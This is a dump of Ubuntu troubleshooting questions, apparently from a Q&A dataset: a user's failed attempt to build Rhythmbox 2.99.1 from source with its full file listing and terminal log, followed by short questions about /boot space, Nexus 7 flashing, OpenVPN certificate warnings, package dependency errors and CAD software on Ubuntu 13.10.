rhythmbox-2.99.1/help/es/figures/rb-window.png rhythmbox-2.99.1/help/es/es.stamp rhythmbox-2.99.1/help/changelog rhythmbox-2.99.1/help/eu/ rhythmbox-2.99.1/help/eu/fdl-appendix.xml rhythmbox-2.99.1/help/eu/legal.xml rhythmbox-2.99.1/help/eu/eu.stamp rhythmbox-2.99.1/help/eu/eu.po rhythmbox-2.99.1/help/eu/index.docbook rhythmbox-2.99.1/help/eu/figures/ rhythmbox-2.99.1/help/eu/figures/rb-toolbar.png rhythmbox-2.99.1/help/eu/figures/rb-window-small.png rhythmbox-2.99.1/help/eu/figures/rb-volume-changer.png rhythmbox-2.99.1/help/eu/figures/rb-statusbar.png rhythmbox-2.99.1/help/eu/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/eu/figures/rb-toolbar-repeat.png rhythmbox-2.99.1/help/eu/figures/rb-notification-zone.png rhythmbox-2.99.1/help/eu/figures/rb-toolbar-shuffle.png rhythmbox-2.99.1/help/eu/figures/rb-notification-window.png rhythmbox-2.99.1/help/eu/figures/rb-podcast-main.png rhythmbox-2.99.1/help/eu/figures/rb-iradio-main.png rhythmbox-2.99.1/help/eu/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/eu/figures/rb-window.png rhythmbox-2.99.1/help/ro/ rhythmbox-2.99.1/help/ro/fdl-appendix.xml rhythmbox-2.99.1/help/ro/legal.xml rhythmbox-2.99.1/help/ro/index.docbook rhythmbox-2.99.1/help/ro/ro.stamp rhythmbox-2.99.1/help/ro/ro.po rhythmbox-2.99.1/help/makefile.am rhythmbox-2.99.1/help/fr/ rhythmbox-2.99.1/help/fr/fdl-appendix.xml rhythmbox-2.99.1/help/fr/legal.xml rhythmbox-2.99.1/help/fr/fr.stamp rhythmbox-2.99.1/help/fr/index.docbook rhythmbox-2.99.1/help/fr/figures/ rhythmbox-2.99.1/help/fr/figures/rb-toolbar.png rhythmbox-2.99.1/help/fr/figures/rb-window-small.png rhythmbox-2.99.1/help/fr/figures/rb-volume-changer.png rhythmbox-2.99.1/help/fr/figures/rb-statusbar.png rhythmbox-2.99.1/help/fr/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/fr/figures/rb-notification-zone.png rhythmbox-2.99.1/help/fr/figures/rb-notification-window.png rhythmbox-2.99.1/help/fr/figures/rb-podcast-main.png rhythmbox-2.99.1/help/fr/figures/rb-iradio-main.png rhythmbox-2.99.1/help/fr/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/fr/figures/rb-window.png rhythmbox-2.99.1/help/fr/fr.po rhythmbox-2.99.1/help/pt/ rhythmbox-2.99.1/help/pt/fdl-appendix.xml rhythmbox-2.99.1/help/pt/legal.xml rhythmbox-2.99.1/help/pt/pt.stamp rhythmbox-2.99.1/help/pt/pt.po rhythmbox-2.99.1/help/pt/index.docbook rhythmbox-2.99.1/help/sl/ rhythmbox-2.99.1/help/sl/fdl-appendix.xml rhythmbox-2.99.1/help/sl/legal.xml rhythmbox-2.99.1/help/sl/sl.po rhythmbox-2.99.1/help/sl/sl.stamp rhythmbox-2.99.1/help/sl/index.docbook rhythmbox-2.99.1/help/ja/ rhythmbox-2.99.1/help/ja/fdl-appendix.xml rhythmbox-2.99.1/help/ja/legal.xml rhythmbox-2.99.1/help/ja/ja.stamp rhythmbox-2.99.1/help/ja/index.docbook rhythmbox-2.99.1/help/ja/ja.po rhythmbox-2.99.1/help/oc/ rhythmbox-2.99.1/help/oc/fdl-appendix.xml rhythmbox-2.99.1/help/oc/legal.xml rhythmbox-2.99.1/help/oc/oc.stamp rhythmbox-2.99.1/help/oc/oc.po rhythmbox-2.99.1/help/oc/index.docbook rhythmbox-2.99.1/help/makefile.in rhythmbox-2.99.1/configure rhythmbox-2.99.1/doc/ rhythmbox-2.99.1/doc/makefile.am rhythmbox-2.99.1/doc/makefile.in rhythmbox-2.99.1/doc/reference/ rhythmbox-2.99.1/doc/reference/rhythmbox-sections.txt rhythmbox-2.99.1/doc/reference/rhythmbox-overrides.txt rhythmbox-2.99.1/doc/reference/tmpl/ rhythmbox-2.99.1/doc/reference/tmpl/rb-removable-media-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-shell-clipboard.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-tree-dnd.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-playlist-manager.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-song-info.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source-toolbar.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-entry-view.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-query-creator.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-device-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmbox-unused.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-import-job.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page-list.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page-tree.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-property-model.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-ext-db-key.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-fading-image.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source-search.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-library-browser.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-player.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-library-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-media-player-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-query-result-list.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-application.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-alert-dialog.sgml rhythmbox-2.99.1/doc/reference/tmpl/mediaplayerid.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-static-playlist-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-play-queue-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-shell-player.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-async-queue-watch.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-stock-icons.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-encoder.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-shell-preferences.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-gst-media-types.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-auto-playlist-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source-header.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-search-entry.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-play-order-random.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-dialog.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-history.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-debug.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source-search-basic.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-ext-db.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-sourcelist.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-text-helpers.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-query-results.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-missing-files-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-async-copy.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-query-model.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-player-gst-tee.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-rating-helper.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-header.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-uri-dialog.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-source-group.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-metadata.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-browser-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-shell.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-file-helpers.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-segmented-bar.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-property-view.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-sourcelist-model.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-track-transfer-batch.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-string-value-map.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-track-transfer-queue.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-streaming-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-import-errors-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rhythmdb-entry-type.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-cell-renderer-pixbuf.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-rating.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-removable-media-manager.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page-model.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-util.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-refstring.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-transfer-target.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-play-order.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-player-gst-data-tee.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-builder-helpers.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-chunk-loader.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-cell-renderer-rating.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page-group.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-playlist-source.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-button-bar.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-statusbar.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-display-page-menu.sgml rhythmbox-2.99.1/doc/reference/tmpl/rb-player-gst-filter.sgml rhythmbox-2.99.1/doc/reference/rhythmbox.types rhythmbox-2.99.1/doc/reference/html/ rhythmbox-2.99.1/doc/reference/html/rbcellrendererrating.html rhythmbox-2.99.1/doc/reference/html/rbheader.html rhythmbox-2.99.1/doc/reference/html/rbmissingfilessource.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-tree-dnd.html rhythmbox-2.99.1/doc/reference/html/ch02.html rhythmbox-2.99.1/doc/reference/html/rbmetadata.html rhythmbox-2.99.1/doc/reference/html/rhythmdb.html rhythmbox-2.99.1/doc/reference/html/rbdisplaypagemodel.html rhythmbox-2.99.1/doc/reference/html/rblibrarysource.html rhythmbox-2.99.1/doc/reference/html/rbplayer.html rhythmbox-2.99.1/doc/reference/html/rhythmdbqueryresults.html rhythmbox-2.99.1/doc/reference/html/rbmediaplayersource.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-ext-db-key.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-debug.html rhythmbox-2.99.1/doc/reference/html/rbremovablemediamanager.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-builder-helpers.html rhythmbox-2.99.1/doc/reference/html/ch01.html rhythmbox-2.99.1/doc/reference/html/rbplayergstfilter.html rhythmbox-2.99.1/doc/reference/html/rbshellclipboard.html rhythmbox-2.99.1/doc/reference/html/rbstaticplaylistsource.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-util.html rhythmbox-2.99.1/doc/reference/html/rbautoplaylistsource.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rbextdb.html rhythmbox-2.99.1/doc/reference/html/rbimporterrorssource.html rhythmbox-2.99.1/doc/reference/html/rbcellrendererpixbuf.html rhythmbox-2.99.1/doc/reference/html/rbplayergsttee.html rhythmbox-2.99.1/doc/reference/html/rhythmdbentrytype.html rhythmbox-2.99.1/doc/reference/html/rburidialog.html rhythmbox-2.99.1/doc/reference/html/rbshellplayer.html rhythmbox-2.99.1/doc/reference/html/ch06.html rhythmbox-2.99.1/doc/reference/html/rblibrarybrowser.html rhythmbox-2.99.1/doc/reference/html/rbstreamingsource.html rhythmbox-2.99.1/doc/reference/html/ch07.html rhythmbox-2.99.1/doc/reference/html/rbplayergstdatatee.html rhythmbox-2.99.1/doc/reference/html/rhythmdbquerymodel.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rbencoder.html rhythmbox-2.99.1/doc/reference/html/rhythmdbimportjob.html rhythmbox-2.99.1/doc/reference/html/rbrating.html rhythmbox-2.99.1/doc/reference/html/rbstringvaluemap.html rhythmbox-2.99.1/doc/reference/html/rhythmdbpropertymodel.html rhythmbox-2.99.1/doc/reference/html/rbdisplaypage.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-gst-media-types.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-rating-helper.html rhythmbox-2.99.1/doc/reference/html/ch03.html rhythmbox-2.99.1/doc/reference/html/rbshell.html rhythmbox-2.99.1/doc/reference/html/rbsearchentry.html rhythmbox-2.99.1/doc/reference/html/left.png rhythmbox-2.99.1/doc/reference/html/up.png rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-file-helpers.html rhythmbox-2.99.1/doc/reference/html/rbapplication.html rhythmbox-2.99.1/doc/reference/html/ch04.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-async-queue-watch.html rhythmbox-2.99.1/doc/reference/html/style.css rhythmbox-2.99.1/doc/reference/html/rbplayqueuesource.html rhythmbox-2.99.1/doc/reference/html/index.html rhythmbox-2.99.1/doc/reference/html/rhythmbox.devhelp2 rhythmbox-2.99.1/doc/reference/html/rbplaylistsource.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-text-helpers.html rhythmbox-2.99.1/doc/reference/html/rbplaylistmanager.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rb-dialog.html rhythmbox-2.99.1/doc/reference/html/rbshellpreferences.html rhythmbox-2.99.1/doc/reference/html/rbquerycreator.html rhythmbox-2.99.1/doc/reference/html/rbbrowsersource.html rhythmbox-2.99.1/doc/reference/html/rbstatusbar.html rhythmbox-2.99.1/doc/reference/html/rbdisplaypagegroup.html rhythmbox-2.99.1/doc/reference/html/index.sgml rhythmbox-2.99.1/doc/reference/html/rhythmbox-rbdevicesource.html rhythmbox-2.99.1/doc/reference/html/rbdisplaypagetree.html rhythmbox-2.99.1/doc/reference/html/rbtracktransferbatch.html rhythmbox-2.99.1/doc/reference/html/rbentryview.html rhythmbox-2.99.1/doc/reference/html/rbplayorder.html rhythmbox-2.99.1/doc/reference/html/rhythmbox-rbtransfertarget.html rhythmbox-2.99.1/doc/reference/html/rbsonginfo.html rhythmbox-2.99.1/doc/reference/html/rbpropertyview.html rhythmbox-2.99.1/doc/reference/html/home.png rhythmbox-2.99.1/doc/reference/html/rbtracktransferqueue.html rhythmbox-2.99.1/doc/reference/html/rbhistory.html rhythmbox-2.99.1/doc/reference/html/rbrandomplayorder.html rhythmbox-2.99.1/doc/reference/html/rbsource.html rhythmbox-2.99.1/doc/reference/html/right.png rhythmbox-2.99.1/doc/reference/html/ch05.html rhythmbox-2.99.1/doc/reference/rhythmbox-docs.sgml rhythmbox-2.99.1/doc/reference/makefile.am rhythmbox-2.99.1/doc/reference/makefile.in rhythmbox-2.99.1/makefile.in rhythmbox-2.99.1/lib/ rhythmbox-2.99.1/lib/rhythmbox-set-star-inline.h rhythmbox-2.99.1/lib/rb-async-copy.h rhythmbox-2.99.1/lib/libmediaplayerid/ rhythmbox-2.99.1/lib/libmediaplayerid/mpid-udev.c rhythmbox-2.99.1/lib/libmediaplayerid/mpid-files.c rhythmbox-2.99.1/lib/libmediaplayerid/mpid-hal.c rhythmbox-2.99.1/lib/libmediaplayerid/mpid-dummy.c rhythmbox-2.99.1/lib/libmediaplayerid/mpid-private.h rhythmbox-2.99.1/lib/libmediaplayerid/mpid-util.c rhythmbox-2.99.1/lib/libmediaplayerid/mpid-device.c rhythmbox-2.99.1/lib/libmediaplayerid/makefile.am rhythmbox-2.99.1/lib/libmediaplayerid/makefile.in rhythmbox-2.99.1/lib/libmediaplayerid/mediaplayerid.h rhythmbox-2.99.1/lib/rb-cut-and-paste-code.h rhythmbox-2.99.1/lib/rb-gst-media-types.h rhythmbox-2.99.1/lib/rb-async-queue-watch.h rhythmbox-2.99.1/lib/rb-util.c rhythmbox-2.99.1/lib/rb-marshal.h rhythmbox-2.99.1/lib/rb-missing-plugins.h rhythmbox-2.99.1/lib/rb-cut-and-paste-code.c rhythmbox-2.99.1/lib/rb-missing-plugins.c rhythmbox-2.99.1/lib/rb-string-value-map.h rhythmbox-2.99.1/lib/rb-async-copy.c rhythmbox-2.99.1/lib/rb-debug.h rhythmbox-2.99.1/lib/eggdesktopfile.c rhythmbox-2.99.1/lib/rb-builder-helpers.c rhythmbox-2.99.1/lib/eggdesktopfile.h rhythmbox-2.99.1/lib/rb-stock-icons.c rhythmbox-2.99.1/lib/rhythmbox-no-star-inline.h rhythmbox-2.99.1/lib/rb-util.h rhythmbox-2.99.1/lib/rb-marshal.c rhythmbox-2.99.1/lib/rb-chunk-loader.c rhythmbox-2.99.1/lib/rb-file-helpers.h rhythmbox-2.99.1/lib/makefile.am rhythmbox-2.99.1/lib/rhythmbox-unset-star-inline.h rhythmbox-2.99.1/lib/rb-chunk-loader.h rhythmbox-2.99.1/lib/rb-stock-icons.h rhythmbox-2.99.1/lib/rb-marshal.list rhythmbox-2.99.1/lib/rb-tree-dnd.h rhythmbox-2.99.1/lib/rb-text-helpers.h rhythmbox-2.99.1/lib/rb-debug.c rhythmbox-2.99.1/lib/rb-gst-media-types.c rhythmbox-2.99.1/lib/rb-string-value-map.c rhythmbox-2.99.1/lib/rb-async-queue-watch.c rhythmbox-2.99.1/lib/rb-text-helpers.c rhythmbox-2.99.1/lib/rb-tree-dnd.c rhythmbox-2.99.1/lib/makefile.in rhythmbox-2.99.1/lib/rb-builder-helpers.h rhythmbox-2.99.1/lib/rb-file-helpers.c rhythmbox-2.99.1/install-sh david @ david-virtualbox : ~/downloads/src $ cd rhythmbox-2.99.1/ david @ david-virtualbox : ~/downloads/src/rhythmbox-2.99.1 $ sudo apt-get build-dep rhythmbox [ sudo ] password for david : reading package lists ... done building dependency tree reading state information ... done the following packages have unmet dependencies : gobject-introspection : depends : libgirepository-1.0-1 ( = 1.33.14-1 ) but 1.34.0+git20121017.aa4f3c70-0ubuntu1~12.04~ricotz0 is to be installed libbrasero-media3-dev : depends : libbrasero-media3-1 ( = 3.4.1-0ubuntu2 ) but 3.6.1-0ubuntu2~ubuntu12.10.1 is to be installed libclutter-1.0-dev : depends : libclutter-1.0-0 ( = 1.12.0-0ubuntu1 ) but 1.12.2-0ubuntu1~12.04~ricotz0 is to be installed depends : libcairo2-dev ( > = 1.10 ) but it is not going to be installed depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed depends : libcogl-dev ( > = 1.9.8 ) but it is not going to be installed depends : libcogl-pango-dev ( > = 1.9.8 ) but it is not going to be installed depends : libgl1-mesa-dev ( > = 7.1~rc3-1~ ) libclutter-gst-dev : depends : libclutter-gst-1.0-0 ( = 1.6.0-1 ) but 1.6.1~git20120925.c7adcda3-0ubuntu1~12.04~ricotz0 is to be installed libclutter-gtk-1.0-dev : depends : libclutter-gtk-1.0-0 ( = 1.3.2-0ubuntu1 ) but 1.4.0-0ubuntu1~12.04~ricotz0 is to be installed libgirepository1.0-dev : depends : libgirepository-1.0-1 ( = 1.33.14-1 ) but 1.34.0+git20121017.aa4f3c70-0ubuntu1~12.04~ricotz0 is to be installed depends : gir1.2-glib-2.0 ( = 1.33.14-1 ) but 1.34.0+git20121017.aa4f3c70-0ubuntu1~12.04~ricotz0 is to be installed depends : gir1.2-freedesktop ( = 1.33.14-1 ) but 1.34.0+git20121017.aa4f3c70-0ubuntu1~12.04~ricotz0 is to be installed libglib2.0-dev : depends : libglib2.0-0 ( = 2.34.0-1ubuntu1 ) but 2.34.1-1ubuntu1 is to be installed depends : libglib2.0-bin ( = 2.34.0-1ubuntu1 ) but 2.34.1-1ubuntu1 is to be installed libgpod-dev : depends : libgpod4 ( = 0.8.2-6build1 ) but 0.8.2-6ubuntu1 is to be installed depends : libgtk2.0-dev but it is not going to be installed depends : libimobiledevice-dev but it is not going to be installed libgstreamer-plugins-base0.10-dev : depends : libgstreamer-plugins-base0.10-0 ( = 0.10.36-1ubuntu1 ) but 0.10.36-1ubuntu1.1 is to be installed depends : gir1.2-gst-plugins-base-0.10 ( = 0.10.36-1ubuntu1 ) but 0.10.36-1ubuntu1.1 is to be installed libgtk-3-dev : depends : libgtk-3-0 ( = 3.6.0-0ubuntu3 ) but 3.6.2-0ubuntu1~ubuntu12.10.2 is to be installed depends : gir1.2-gtk-3.0 ( = 3.6.0-0ubuntu3 ) but 3.6.2-0ubuntu1~ubuntu12.10.2 is to be installed depends : libpango1.0-dev ( > = 1.30.0 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.10.0 ) but it is not going to be installed libpeas-dev : depends : libpeas-1.0-0 ( = 1.4.0-2ubuntu3 ) but 1.6.1-0ubuntu1~quantal1 is to be installed depends : gir1.2-peas-1.0 ( = 1.4.0-2ubuntu3 ) but 1.6.1-0ubuntu1~quantal1 is to be installed libwebkitgtk-3.0-dev : depends : libwebkitgtk-3.0-0 ( = 1.10.0-0ubuntu1 ) but 1.10.0-0ubuntu1.1 is to be installed depends : gir1.2-webkit-3.0 ( = 1.10.0-0ubuntu1 ) but 1.10.0-0ubuntu1.1 is to be installed depends : libjavascriptcoregtk-3.0-dev ( = 1.10.0-0ubuntu1 ) but it is not going to be installed python-dev : depends : python ( = 2.7.3-0ubuntu7 ) but 2.7.3-0ubuntu7.1 is to be installed e : build-dependencies for rhythmbox could not be satisfied . david @ david-virtualbox : ~/downloads/src/rhythmbox-2.99.1 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for gobject-introspection ... configure : error : gobject-introspection-1.0 is not installed david @ david-virtualbox : ~/downloads/src/rhythmbox-2.99.1 $ make make : *** no targets specified and no makefile found . stop . david @ david-virtualbox : ~/downloads/src/rhythmbox-2.99.1 $ sudo make install make : *** no rule to make target 'install ' . stop . david @ david-virtualbox : ~/downloads/src/rhythmbox-2.99.1 $ ^c edit so if i chose to installl from .deb and then run sudo apt-get -f install will that install all the dependencies for rhythmbox 2.99.1 ? edit the answer by rajagenupula does n't work . it just downgrades rhythmbox . i ca n't put the terminal log in here but its available here : http : //paste.ubuntu.com/7133595/
424681	how do i free up space to install software updates ?	the upgrade needs a total of 87.5 m free space on disk '/boot ' . please free at least an additional 32.8 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' .
424684	nexus 7 wi-fi ( 4.4.2 )	i 'm stuck on step 4 : to bootstrap on the devel channel or reinstall afresh ( wiping everything ) the recommended command is to be run from the bootloader : ubuntu-device-flash -- channel devel -- bootstrap when i use that command , it says command does not exist when i use instructions for manual install : i use the first command , adb reboot fastboot - it works and it reboots . but when i move to the next command : fastboot flash recovery trusty-preinstalled-recovery-armel+grouper.img all that happens is i get this : '' waiting for device '' and it hangs there forever .
424687	unable to find a medium containing a live file system internal hdd	i am trying to load ubuntu 13.10 on an internal hdd in my tower . i reformatted the drive and made it an exfat format . then used the universal usb installer to load my iso . i went into bios and switched what hard drive it needs to boot from . ubuntu loads and the i receive the unable to find a medium containing a live file system error . any ideas ?
424688	how to install mpeg-1 layer 3 ( mp3 ) ubuntu 13.10 64 bit	i dont't want to install any different software to play audio and video ( want to use default player only ) . also i dont want to install any separate software to configure my plug ins for me . i need to install the mpeg-1 layer-3 ( mp3 ) as shown by ubuntu 13.10 64bit when i try and play any audio file . kindly help . i would prefer to download a package from official website and configure it manually like i did for firefox plug in in order to play video of youtube .
424690	man in the middle attack warning with openvpn	when using openvpn -- config /home/xxx/vpnbook-uk1-udp25000.ovpn i always get this warning : sat feb 22 11:16:04 2014 warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . very possibly this is related with this issue i 'm having . what should i do about this man in the middle attack warning ?
424696	missing integration options for online accounts in 13.10	for some reason i do not have all the plugins that should be here in online accounts ( twitter option is not there by deafault but i can install it ) and the options to integrate seems to be missing ( gmail and facebook feed , etc ) . the only options i get from google is photos search plugin and google drive search plugin . libgoa-1.0-0 is already installed.i also tried re-installing account-plugin-google and libaccount-plugin-google but it did not help . i recently upgraded to ubuntu 13.10 from 13.04 and this problem existed on 13.04 also .
424697	can not install x11-basic on ubuntu 13.10	trying to install x11-basic on ubuntu 13.10 creates an error with following details : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 303471 files and directories currently installed . ) removing x11basic ... removing liblapack3 ... update-alternatives : using /usr/lib/atlas-base/atlas/liblapack.so.3 to provide /usr/lib/liblapack.so.3 ( liblapack.so.3 ) in auto mode processing triggers for man-db ... selecting previously unselected package liblapack3 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 303429 files and directories currently installed . ) unpacking liblapack3 ( from ... /liblapack3_3.4.2+dfsg-2_amd64.deb ) ... selecting previously unselected package liblapack3gf . unpacking liblapack3gf ( from ... /liblapack3gf_3.4.2+dfsg-2_all.deb ) ... setting up liblapack3 ( 3.4.2+dfsg-2 ) ... update-alternatives : using /usr/lib/lapack/liblapack.so.3 to provide /usr/lib/liblapack.so.3 ( liblapack.so.3 ) in auto mode setting up liblapack3gf ( 3.4.2+dfsg-2 ) ... selecting previously unselected package x11basic . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 303441 files and directories currently installed . ) unpacking x11basic ( from ... /x11basic_1.22-83_i386.deb ) ... dpkg : dependency problems prevent configuration of x11basic : x11basic depends on liblapack3gf . dpkg : error processing x11basic ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... what can i do ?
424702	unable to synchronize mmap error on update	ubuntu updation took more time then normal and after updation finished when try to view updates gave the below mentioned error e : unable to synchronize mmap - msync ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened .
424706	neither draftsight nor bricscad can be installed on 64 bit ubuntu 13.10	ok , after weeks of trying , reading and searching you guys are my last hope . let me tell you my test environment ; 3 different computers ; desktop with i5 cpu , 8gb of ram , geforce 630 gpu notebook with i5 cpu , 4gb of ram , geforce 420m notebook with intel pentium dual core 2ghz , 4gb of ram , ati radeon 4700 notebooks have 750gb hard drives , pc has 1tb . software-wise i follow the exact same pattern for all of them , which is ; divide hard drive into 4 partitions : 350 windows 8.1 startup partition ( it creates it itself ) 2000gb for windows 8.1 8gb of swap area the rest is ext4 for `` / '' of ubuntu 13.10 64 bit all systems are installed only the windows 8.1 64bit , ubuntu 13.10 64 bit and all updates available ( windows 8.1 also has norton 360 ) and nothing else so no modifications to any systems , neither ubuntu nor windows . however , i can easily click and install both bricscad v14 and draftsight v1r5 and use them without any problems in windows but when it comes to installing them on ubuntu 13.10 there is no luck . i have downloaded many 32bit dependencies , tried modifying the .deb files , checking `` start them as a program '' box.. none helped . where i have achieved so far is ; they both have their icons on dash . bricscad gives me a `` activate or try '' window and there is no way of passing that screen . tried `` activate trial '' in different scenerios and downloading a licence but no luck . draftsight , on the other hand starts but with only its own drawing . there is no way of opening a new project or another dwg file.. it can save its own dwg project but can not start it after , so no use basicly.. all the computers are exactly in the same situation , nothing i have done was able to give me a ready-to-use bricscad or draftsight experience .
424708	can i run the unity launcher in gnome 3 ?	i would like to use gnome 3 with the unity launcher and dash . is there any way to do this ?
